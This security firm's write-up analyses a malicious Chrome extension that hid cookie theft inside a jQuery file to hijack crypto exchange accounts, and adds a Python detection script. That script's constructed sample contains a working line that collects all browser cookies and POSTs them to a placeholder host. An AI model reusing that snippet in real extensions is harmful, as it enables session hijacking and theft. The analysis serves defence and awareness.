On March 1, 2024, according to feedback from Twitter user @doomxbt, an abnormal situation occurred with their Binance account, with funds suspected to have been stolen:
Initially, this incident did not attract much attention. However, on May 28, 2024, Twitter user @Tree_of_Alpha analyzed and discovered that the victim, @doomxbt, had likely installed a malicious Aggr extension from the Chrome store, which had many positive reviews! This extension could steal all cookies from the websites visited by the user, and two months ago, someone paid influencers to promote it.
Recently, attention to this incident has increased. Some victims had their login credentials stolen, and subsequently, hackers used these to steal the victims' cryptocurrency assets through coordinated attacks. Many users have consulted the SlowMist security team about this issue. Next, we will analyze this attack incident in detail to sound the alarm for the crypto community.
First, we need to locate this malicious extension. Although Google has already removed this malicious extension, we can still see some historical data through snapshot information.
After downloading and analyzing, the main JS files in the directory are background.js, content.js, jquery-3.6.0.min.js, and jquery-3.5.1.min.js.
During the static analysis, we found that background.js and content.js did not contain much complex code, nor did they have any obvious suspicious code logic. However, we found a site link in background.js, which sends data obtained by the plugin to https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
By analyzing the manifest.json file, we can see that background uses /jquery/jquery-3.6.0.min.js, and content uses /jquery/jquery-3.5.1.min.js. Therefore, we focused on analyzing these two jquery files:
In jquery/jquery-3.6.0.min.js, we found suspicious malicious code that collects the browser's cookies, serializes them as JSON, and sends them to the site: https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
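As an added example (not SlowMist's tooling nor anything from the extension itself), a small static triage script in Python that applies the findings above: it reads manifest.json, follows the background and content script paths, and flags any script that touches cookie APIs or sends data out, treating a file named like a public library that does so as the strongest signal. The extension directory it builds is a constructed sample and the collector URL is a placeholder.

```python
import json, re, tempfile
from pathlib import Path

# A genuine library build never touches extension cookie APIs, so cookie access inside a "jquery-*.min.js" is a strong indicator.
COOKIE_ACCESS = re.compile(r"chrome\.cookies\.|browser\.cookies\.|document\.cookie")
NETWORK_SEND = re.compile(r"\bfetch\(|XMLHttpRequest|navigator\.sendBeacon|\$\.(?:ajax|post)\(")
EXTERNAL_URL = re.compile(r"https?://[\w.-]+\.[a-z]{2,}[^\s'\"]*", re.I)
LIBRARY_NAME = re.compile(r"^(?:jquery|lodash|react|vue|angular)[-.]", re.I)

def scripts_from_manifest(manifest: dict) -> list:
    """Every script path the manifest loads (MV2 background.scripts, MV3 service_worker, content_scripts)."""
    bg = manifest.get("background", {})
    paths = list(bg.get("scripts", [])) + ([bg["service_worker"]] if "service_worker" in bg else [])
    for cs in manifest.get("content_scripts", []):
        paths.extend(cs.get("js", []))
    return [p.lstrip("/") for p in paths]

def triage_extension(root: Path) -> dict:
    """Static triage of an unpacked extension directory: flag scripts that read cookies or send data out."""
    manifest = json.loads((root / "manifest.json").read_text())
    report = {"cookies_permission": "cookies" in manifest.get("permissions", []), "findings": []}
    for rel in scripts_from_manifest(manifest):
        src = (root / rel).read_text(errors="ignore")
        flags = [name for rx, name in ((COOKIE_ACCESS, "cookie-access"),
                                       (NETWORK_SEND, "network-send")) if rx.search(src)]
        if flags and LIBRARY_NAME.match(Path(rel).name):
            flags.append("library-file-with-extension-api")
        if flags:
            report["findings"].append({"file": rel, "flags": flags,
                                       "urls": sorted(set(EXTERNAL_URL.findall(src)))})
    return report

def demo() -> dict:
    """Constructed sample with the file layout the analysis describes; the collector URL is a placeholder."""
    root = Path(tempfile.mkdtemp())
    (root / "jquery").mkdir()
    (root / "manifest.json").write_text(json.dumps({
        "manifest_version": 2, "permissions": ["cookies", "<all_urls>"],
        "background": {"scripts": ["/jquery/jquery-3.6.0.min.js", "background.js"]},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["/jquery/jquery-3.5.1.min.js", "content.js"]}]}))
    for name in ("background.js", "content.js"):  # benign glue files, as in the analysed extension
        (root / name).write_text("console.log('init');")
    (root / "jquery" / "jquery-3.5.1.min.js").write_text("/*! jQuery v3.5.1 */ window.jQuery=function(){};")
    (root / "jquery" / "jquery-3.6.0.min.js").write_text(  # tampered library copy: cookie read plus POST
        "/*! jQuery v3.6.0 */ chrome.cookies.getAll({},function(c){"
        "fetch('https://collector.example/index.php',{method:'POST',body:JSON.stringify(c)})});")
    return triage_extension(root)
```

Run against a real unpacked CRX, a hit on `library-file-with-extension-api` is worth a manual look regardless of how the file is named or how many reviews the listing has.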
After the static analysis, to more accurately analyze the behavior of the malicious extension in sending data, we began installing and debugging the extension. (Note: Analysis should be conducted in a brand-new testing environment with no logged-in accounts, and the malicious site should be changed to a controlled one to avoid sending sensitive data to the attacker's server during testing).
After installing the malicious extension in the test environment, we opened an arbitrary website, such as google.com, and observed the network requests made by the extension's background page, finding that Google's cookie data was sent to an external server:
We also saw the cookie data sent by the malicious extension on the Weblog service:
At this point, once the attacker has obtained a user's authentication credentials by hijacking cookies through the browser extension, they can carry out coordinated attacks against certain trading websites to steal the user's cryptocurrency assets.
Next, we analyzed the malicious link https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
Involved domain: aggrtrade-extension[.]com
Parsing the domain information shown above:
The .ru suffix suggests a typical Russian user, so this is most likely a Russian or Eastern European hacker group.
Attack timeline:
Analyzing the fake AGGR (aggr.trade) malicious website aggrtrade-extension[.]com, we found that the hackers had been planning the attack for three years:
Four months ago, the hackers deployed the attack:
According to the InMist threat intelligence collaboration network, we found that the hacker's IP is located in Moscow, using a VPS provided by srvape.com, and the email is [email protected].
After successful deployment, the hackers began promoting on Twitter, waiting for victims to take the bait. The rest of the story is well known; some users installed the malicious extension and then were robbed.
Below is the official warning from AggrTrade:
The SlowMist security team reminds users that the risk of a browser extension is almost as great as running an executable file directly, so be sure to thoroughly review extensions before installing them. Also, be wary of people who send you private messages. Nowadays, hackers and scammers like to impersonate legitimate, well-known projects to scam content creators under the guise of sponsorship or promotion. Finally, always maintain a skeptical attitude while navigating the blockchain dark forest, make sure that what you install is safe, and give hackers no opening to exploit.